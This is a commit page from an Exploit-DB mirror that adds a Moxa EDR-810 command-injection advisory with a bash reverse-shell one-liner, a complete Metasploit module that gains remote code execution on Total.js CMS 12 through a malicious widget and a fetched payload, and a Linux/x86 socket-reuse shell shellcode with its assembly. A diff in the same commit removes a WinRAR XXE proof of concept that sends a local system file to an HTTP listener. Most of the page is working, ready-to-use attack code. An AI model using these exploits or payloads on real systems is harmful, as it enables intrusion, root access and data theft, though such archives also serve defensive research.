bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2019-10-23

Browse source 
5 changes to exploits/shellcodes

winrar 5.80 - XML External Entity Injection
Total.js CMS 12 - Widget JavaScript Code Injection (Metasploit)
Moxa EDR-810 - Command Injection / Information Disclosure

Linux/x86 - execve(/bin/sh) socket reuse Shellcode (42 bytes)
This commit is contained in:
Offensive Security 2019-10-23 05:01:41 +00:00
parent e4e566f5ff
commit a464ad083a
6 changed files with 461 additions and 39 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

67
exploits/hardware/remote/47536.txt Normal file
View file

@ -0,0 +1,67 @@
During an engagement for a client, RandoriSec found 2 vulnerabilities on Moxa EDR-810 Series Secure Routers. The first one is a command injection vulnerability found on the CLI allowing an authenticated user to obtain root privileges. And the other one is an improper access control found on the web server allowing to retrieve log files.
As usual, we reported those issues directly to Moxa and ICS-CERT (Industrial Control Systems Cyber Emergency Response Team) in order to “responsible disclose” them.
The ICS-CERT advisory was published on their website and a new EDR-810 firmware was provided by Moxa.
Many thanks to Moxa and ICS-CERT teams for their help.
Advisory
The following two product vulnerabilities were identified in Moxa’s EDR-810 Series Secure Routers, all versions 5.1 and prior are vulnerable:
CVE-2019-10969: An exploitable command injection vulnerability exists in the CLI functionality, which is provided by the Telnet and SSH services. An authenticated attacker (with admin or configadmin privileges) can abuse the ping feature to execute commands on the router. As the CLI is executed with root privileges, it is possible to obtain a root shell on the device. A CVSS v3 base score of 7.2 has been calculated.
CVE-2019-10963: An unauthenticated attacker can retrieve all the log files (Firewall, IPSec and System) from the webserver. In order to exploit the issue, a legitimate user had to export the log files previously. A CVSS v3 base score of 4.3 has been calculated.
Exploitation
CVE-2019-10969 - Ping Command Injection
The Telnet and SSH services provide a Command Line Interface (CLI), which is a restricted shell allowing to perform a subset of actions on the device. The ping function of the CLI is vulnerable to command injection. It is possible to specify a specific hostname, such as ($/bin/bash), in order to obtain a shell as shown below:
Ping command injection
Due to limitations on the CLI, it is not possible to use the shell as is. The attacker can use a reverse shell as shown below:
bash -i >& /dev/tcp/YOUR_IP_ADDRESS/1234 0>&1
CVE-2019-10963 - Missing Access Control On Log Files
When a legitimate user (admin or configadmin for instance) export the logs files from the MOXA router. The files are stored at the root of the webserver, as follow:
http://IP_ADDRESS_MOXA/MOXA_All_LOG.tar.gz
An attacker can retrieve this archive without being authenticated on the Web interface as shown below:
# wget http://192.168.0.1/MOXA_All_LOG.tar.gz
--2019-02-13 17:35:19-- http://192.168.0.1/MOXA_All_LOG.tar.gz
Connexion à 192.168.0.1:80... connecté.
requête HTTP transmise, en attente de la réponse... 200 OK
Taille : 15724 (15K) [text/plain]
Sauvegarde en : " MOXA_All_LOG.tar.gz "
MOXA_All_LOG.tar.gz 100%[====================================================================================================================================>] 15,36K --.-KB/s ds 0s
2019-02-13 17:35:19 (152 MB/s) - " MOXA_All_LOG.tar.gz " sauvegardé [15724/15724]
# tar ztvf MOXA_All_LOG.tar.gz
drwxr-xr-x admin/root 0 2019-02-13 11:55 moxa_log_all/
-rw-r--r-- admin/root 326899 2019-02-13 11:55 moxa_log_all/MOXA_Firewall_LOG.ini
-rw-r--r-- admin/root 156 2019-02-13 11:55 moxa_log_all/MOXA_IPSec_LOG.ini
-rw-r--r-- admin/root 68465 2019-02-13 11:55 moxa_log_all/MOXA_LOG.ini
Mitigation
It is recommended to install at least the firmware version 5.3 from Moxa website.
Timeline
2019-02-24: Vendor Disclosure
2019-02-24: Advisory sent to ICS-CERT
2019-09-30: Advisory published by Moxa
2019-10-01: Advisory published by ICS-CERT

309
exploits/multiple/remote/47531.rb Executable file
View file

@ -0,0 +1,309 @@
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::EXE
include Msf::Exploit::CmdStager
def initialize(info={})
super(update_info(info,
'Name' => 'Total.js CMS 12 Widget JavaScript Code Injection',
'Description' => %q{
This module exploits a vulnerability in Total.js CMS. The issue is that a user with
admin permission can embed a malicious JavaScript payload in a widget, which is
evaluated server side, and gain remote code execution.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Riccardo Krauter', # Original discovery
'sinn3r' # Metasploit module
],
'Arch' => [ARCH_X86, ARCH_X64],
'Targets' =>
[
[ 'Total.js CMS on Linux', { 'Platform' => 'linux', 'CmdStagerFlavor' => 'wget'} ],
[ 'Total.js CMS on Mac', { 'Platform' => 'osx', 'CmdStagerFlavor' => 'curl' } ]
],
'References' =>
[
['CVE', '2019-15954'],
['URL', 'https://seclists.org/fulldisclosure/2019/Sep/5'],
['URL', 'https://github.com/beerpwn/CVE/blob/master/Totaljs_disclosure_report/report_final.pdf']
],
'DefaultOptions' =>
{
'RPORT' => 8000,
},
'Notes' =>
{
'SideEffects' => [ IOC_IN_LOGS ],
'Reliability' => [ REPEATABLE_SESSION ],
'Stability' => [ CRASH_SAFE ]
},
'Privileged' => false,
'DisclosureDate' => '2019-08-30', # Reported to seclist
'DefaultTarget' => 0))
register_options(
[
OptString.new('TARGETURI', [true, 'The base path for Total.js CMS', '/']),
OptString.new('TOTALJSUSERNAME', [true, 'The username for Total.js admin', 'admin']),
OptString.new('TOTALJSPASSWORD', [true, 'The password for Total.js admin', 'admin'])
])
end
class AdminToken
attr_reader :token
def initialize(cookie)
@token = cookie.scan(/__admin=([a-zA-Z\d]+);/).flatten.first
end
def blank?
token.blank?
end
end
class Widget
attr_reader :name
attr_reader :category
attr_reader :source_code
attr_reader :platform
attr_reader :url
def initialize(p, u, stager)
@name = "p_#{Rex::Text.rand_text_alpha(10)}"
@category = 'content'
@platform = p
@url = u
@source_code = %Q|<script total>|
@source_code << %Q|global.process.mainModule.require('child_process')|
@source_code << %Q|.exec("sleep 2;#{stager}");|
@source_code << %Q|</script>|
end
end
def check
code = CheckCode::Safe
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, 'admin', 'widgets')
})
unless res
vprint_error('Connection timed out')
return CheckCode::Unknown
end
# If the admin's login page is visited too many times, we will start getting
# a 401 (unauthorized response). In that case, we only have a header to work
# with.
if res.headers['X-Powered-By'].to_s == 'Total.js'
code = CheckCode::Detected
end
# If we are here, then that means we can still see the login page.
# Let's see if we can extract a version.
html = res.get_html_document
element = html.at('title')
return code unless element.respond_to?(:text)
title = element.text.scan(/CMS v([\d\.]+)/).flatten.first
return code unless title
version = Gem::Version.new(title)
if version <= Gem::Version.new('12')
# If we are able to check the version, we could try the default cred and attempt
# to execute malicious code and see how the application responds. However, this
# seems to a bit too aggressive so I'll leave that to the exploit part.
return CheckCode::Appears
end
CheckCode::Safe
end
def auth(user, pass)
json_body = { 'name' => user, 'password' => pass }.to_json
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri, 'api', 'login', 'admin'),
'ctype' => 'application/json',
'data' => json_body
})
unless res
fail_with(Failure::Unknown, 'Connection timed out')
end
json_res = res.get_json_document
cookies = res.get_cookies
# If it's an array it could be an error, so we are specifically looking for a hash.
if json_res.kind_of?(Hash) && json_res['success']
token = AdminToken.new(cookies)
@admin_token = token
return token
end
fail_with(Failure::NoAccess, 'Invalid username or password')
end
def create_widget(admin_token)
platform = target.platform.names.first
host = datastore['SRVHOST'] == '0.0.0.0' ? Rex::Socket::source_address : datastore['SRVHOST']
port = datastore['SRVPORT']
proto = datastore['SSL'] ? 'https' : 'http'
payload_name = "p_#{Rex::Text.rand_text_alpha(5)}"
url = "#{proto}://#{host}:#{port}#{get_resource}/#{payload_name}"
widget = Widget.new(platform, url, generate_cmdstager(
'Path' => "#{get_resource}/#{payload_name}",
'temp' => '/tmp',
'file' => payload_name
).join(';'))
json_body = {
'name' => widget.name,
'category' => widget.category,
'body' => widget.source_code
}.to_json
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, 'admin', 'api', 'widgets'),
'cookie' => "__admin=#{admin_token.token}",
'ctype' => 'application/json',
'data' => json_body
})
unless res
fail_with(Failure::Unknown, 'Connection timed out')
end
res_json = res.get_json_document
if res_json.kind_of?(Hash) && res_json['success']
print_good("Widget created successfully")
else
fail_with(Failure::Unknown, 'No success message in body')
end
widget
end
def get_widget_item(admin_token, widget)
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, 'admin', 'api', 'widgets'),
'cookie' => "__admin=#{admin_token.token}",
'ctype' => 'application/json'
})
unless res
fail_with(Failure::Unknown, 'Connection timed out')
end
res_json = res.get_json_document
count = res_json['count']
items = res_json['items']
unless count
fail_with(Failure::Unknown, 'No count key found in body')
end
unless items
fail_with(Failure::Unknown, 'No items key found in body')
end
items.each do |item|
widget_name = item['name']
if widget_name.match(/p_/)
return item
end
end
[]
end
def clear_widget
admin_token = get_admin_token
widget = get_widget
print_status('Finding the payload from the widget list...')
item = get_widget_item(admin_token, widget)
json_body = {
'id' => item['id'],
'picture' => item['picture'],
'name' => item['name'],
'icon' => item['icon'],
'category' => item['category'],
'datecreated' => item['datecreated'],
'reference' => item['reference']
}.to_json
res = send_request_cgi({
'method' => 'DELETE',
'uri' => normalize_uri(target_uri.path, 'admin', 'api', 'widgets'),
'cookie' => "__admin=#{admin_token.token}",
'ctype' => 'application/json',
'data' => json_body
})
unless res
fail_with(Failure::Unknown, 'Connection timed out')
end
res_json = res.get_json_document
if res_json.kind_of?(Hash) && res_json['success']
print_good("Widget cleared successfully")
else
fail_with(Failure::Unknown, 'No success message in body')
end
end
def on_request_uri(cli, req)
print_status("#{cli.peerhost} requesting: #{req.uri}")
if req.uri =~ /p_.+/
payload_exe = generate_payload_exe(code: payload.encoded)
print_status("Sending payload to #{cli.peerhost}")
send_response(cli, payload_exe, {'Content-Type' => 'application/octet-stream'})
return
end
send_not_found(cli)
end
def on_new_session(session)
clear_widget
end
# This is kind of for cleaning up the wiget, because we cannot pass it as an
# argument in on_new_session.
def get_widget
@widget
end
# This is also kind of for cleaning up widget, because we cannot pass it as an
# argument directly
def get_admin_token
@admin_token
end
def exploit
user = datastore['TOTALJSUSERNAME']
pass = datastore['TOTALJSPASSWORD']
print_status("Attempting to authenticate with #{user}:#{pass}")
admin_token = auth(user, pass)
fail_with(Failure::Unknown, 'No admin token found') if admin_token.blank?
print_good("Authenticatd as: #{user}:#{pass}")
print_status("Creating a widget...")
@widget = create_widget(admin_token)
super
end
end

38
exploits/xml/local/47526.txt
View file

@ -1,38 +0,0 @@
# Exploit Title: winrar 5.80 - XML External Entity Injection
# Exploit Author: albalawi
# Vendor Homepage: https://win-rar.com/fileadmin/winrar-versions/winrar-x64-58b2.exe
# Version: 5.80
# Tested on: Microsoft Windows Version 10.0.18362.418 64bit
# POC
1- python -m SimpleHTTPServer (listens Port 8000)
2- open winrar or any file.rar
3- help
4- help topics
5- Drag the exploit to the window
html file
<htmlL>
<body>
<xml>
<?xml version="1.0"?>
<!DOCTYPE flavios [
<!ENTITY % file SYSTEM "C:\Windows\system.ini">
<!ENTITY % dtd SYSTEM "http://127.0.0.1:8800/start.dtd">
%dtd;]>
<pwn>&send;</pwn>
</xml>
</body>
</html>
==============================
start.dtd
<?xml version="1.0" encoding="UTF-8"?>
<!ENTITY % all "<!ENTITY send SYSTEM 'http://127.0.0.1:8800?%file;'>">
%all;

3
files_exploits.csv
View file

@ -10729,7 +10729,6 @@ id,file,description,date,author,type,platform,port
47521,exploits/windows/local/47521.txt,"BlackMoon FTP Server 3.1.2.1731 - 'BMFTP-RELEASE' Unquoted Serive Path",2019-10-17,"Debashis Pal",local,windows,
47522,exploits/windows/local/47522.txt,"Web Companion versions 5.1.1035.1047 - 'WCAssistantService' Unquoted Service Path",2019-10-17,"Debashis Pal",local,windows,
47523,exploits/windows/local/47523.txt,"WorkgroupMail 7.5.1 - 'WorkgroupMail' Unquoted Service Path",2019-10-17,cakes,local,windows,
47526,exploits/xml/local/47526.txt,"winrar 5.80 - XML External Entity Injection",2019-10-21,alblalawi,local,xml,
47527,exploits/windows/local/47527.txt,"Trend Micro Anti-Threat Toolkit 1.62.0.1218 - Remote Code Execution",2019-10-21,hyp3rlinx,local,windows,
47529,exploits/solaris/local/47529.txt,"Solaris 11.4 - xscreensaver Privilege Escalation",2019-10-21,"Marco Ivaldi",local,solaris,
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
@ -17732,6 +17731,8 @@ id,file,description,date,author,type,platform,port
47500,exploits/linux/remote/47500.py,"Podman & Varlink 1.5.1 - Remote Code Execution",2019-10-15,"Jeremy Brown",remote,linux,
47515,exploits/android/remote/47515.cpp,"Whatsapp 2.19.216 - Remote Code Execution",2019-10-16,"Valerio Brussani",remote,android,
47519,exploits/windows/remote/47519.py,"ThinVNC 1.0b1 - Authentication Bypass",2019-10-17,"Nikhith Tumamlapalli",remote,windows,
47531,exploits/multiple/remote/47531.rb,"Total.js CMS 12 - Widget JavaScript Code Injection (Metasploit)",2019-10-22,Metasploit,remote,multiple,
47536,exploits/hardware/remote/47536.txt,"Moxa EDR-810 - Command Injection / Information Disclosure",2019-10-22,RandoriSec,remote,hardware,
6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,

Can't render this file because it is too large.

1
files_shellcodes.csv
View file

@ -1007,3 +1007,4 @@ id,file,description,date,author,type,platform
47511,shellcodes/linux/47511.c,"Linux/x86 - adduser (User) to /etc/passwd Shellcode (74 bytes)",2019-10-16,bolonobolo,shellcode,linux
47513,shellcodes/linux/47513.c,"Linux/x86 - execve /bin/sh Shellcode (25 bytes)",2019-10-16,bolonobolo,shellcode,linux
47514,shellcodes/linux/47514.c,"Linux/x86 - Reverse Shell NULL free 127.0.0.1:4444 Shellcode (91 bytes)",2019-10-16,bolonobolo,shellcode,linux
47530,shellcodes/linux/47530.txt,"Linux/x86 - execve(/bin/sh) socket reuse Shellcode (42 bytes)",2019-10-22,WangYihang,shellcode,linux

1 id file description date author type platform
1007 47511 shellcodes/linux/47511.c Linux/x86 - adduser (User) to /etc/passwd Shellcode (74 bytes) 2019-10-16 bolonobolo shellcode linux
1008 47513 shellcodes/linux/47513.c Linux/x86 - execve /bin/sh Shellcode (25 bytes) 2019-10-16 bolonobolo shellcode linux
1009 47514 shellcodes/linux/47514.c Linux/x86 - Reverse Shell NULL free 127.0.0.1:4444 Shellcode (91 bytes) 2019-10-16 bolonobolo shellcode linux
1010 47530 shellcodes/linux/47530.txt Linux/x86 - execve(/bin/sh) socket reuse Shellcode (42 bytes) 2019-10-22 WangYihang shellcode linux

82
shellcodes/linux/47530.txt Normal file
View file

@ -0,0 +1,82 @@
# Exploit Name: Linux/x86 - execve(/bin/sh) socket reuse Shellcode (42 bytes)
# Author : WangYihang
# Date: 2019-10-22
# Tested on: Linux_x86
# Shellcode Length: 42
# CVE: N/A
;================================================================================
# Shellcode :
char shellcode[] = "\x31\xdb\xb3\x03\x31\xc9\xb1\x03\xfe\xc9\x31\xc0\xb0\x3f\xcd\x80\x80\xf9\xff\x75\xf3\x31\xc9\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xcd\x80"
;================================================================================
# Python :
shellcode = "\x31\xdb\xb3\x03\x31\xc9\xb1\x03\xfe\xc9\x31\xc0\xb0\x3f\xcd\x80\x80\xf9\xff\x75\xf3\x31\xc9\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xcd\x80"
;================================================================================
; Build :
; $ nasm -f elf32 shellcode.asm -o shellcode
; $ objdump -d shellcode
; shellcode: file format elf32-i386
; Disassembly of section .text:
; 00000000 <_start>:
; 0: 31 db xor %ebx,%ebx
; 2: b3 03 mov $0x3,%bl
; 4: 31 c9 xor %ecx,%ecx
; 6: b1 03 mov $0x3,%cl
; 00000008 <dup2>:
; 8: fe c9 dec %cl
; a: 31 c0 xor %eax,%eax
; c: b0 3f mov $0x3f,%al
; e: cd 80 int $0x80
; 10: 80 f9 ff cmp $0xff,%cl
; 13: 75 f3 jne 8 <dup2>
; 00000015 <execve>:
; 15: 31 c9 xor %ecx,%ecx
; 17: 6a 0b push $0xb
; 19: 58 pop %eax
; 1a: 99 cltd
; 1b: 52 push %edx
; 1c: 68 2f 2f 73 68 push $0x68732f2f
; 21: 68 2f 62 69 6e push $0x6e69622f
; 26: 89 e3 mov %esp,%ebx
; 28: cd 80 int $0x80
;================================================================================
; Assembly language source code :
; shellcode.asm
;global _start
; _start:
; set ebx to the old socket fd = 3
; xor ebx, ebx
; mov bl, 03H
;
; init new socket fd
; xor ecx, ecx
; mov cl, 3
;
; dup2(socket, stdin)
; dup2(socket, stdout)
; dup2(socket, stderr)
; dup2:
; dec cl
; xor eax, eax
; mov al, 3FH
; int 80H
; cmp cl, 0FFH
; jne dup2
;
; execve:
; execve("/bin/sh", "/bin/sh", 0)
; xor ecx, ecx
; push 0bH
; pop eax
; cdq
; push edx
; push "//sh"
; push "/bin"
; mov ebx, esp
; int 80H